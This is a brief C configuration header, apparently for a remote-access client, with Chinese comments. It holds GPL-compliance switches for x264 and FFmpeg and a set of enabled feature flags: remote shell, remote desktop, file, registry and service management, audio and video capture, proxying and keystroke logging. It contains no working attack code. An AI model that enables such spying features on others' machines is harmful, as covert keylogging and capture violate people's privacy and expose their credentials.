26 lines
1.0 KiB
C
26 lines
1.0 KiB
C
|
||
/// 开源协议合规开关
|
||
|
||
// 请设置为禁用,防止GPL开源传染性
|
||
#define DISABLE_X264_FOR_TEST 0
|
||
|
||
// 请设置为禁用,防止GPL开源传染性
|
||
#define DISABLE_FFMPEG_FOR_TEST 0
|
||
|
||
/// 客户端功能开关
|
||
|
||
#define ENABLE_SHELL TRUE // 终端管理
|
||
#define ENABLE_PROC_WND TRUE // 进程/窗口管理
|
||
#define ENABLE_SCREEN TRUE // 远程桌面
|
||
#define ENABLE_FILE_MNG TRUE // 文件管理
|
||
#define ENABLE_AUDIO_MNG TRUE // 语音管理
|
||
#define ENABLE_VIDEO_MNG TRUE // 视频管理
|
||
#define ENABLE_SERVICE_MNG TRUE // 服务管理
|
||
#define ENABLE_REGISTRY TRUE // 注册表管理
|
||
#define ENABLE_KEYBOARD TRUE // 键盘记录
|
||
|
||
#define ENABLE_MESSAGE TRUE // 远程消息
|
||
#define ENABLE_PROXY TRUE // 代理映射
|
||
|
||
#define DISABLED_FEATURE "Feature Disabled"
|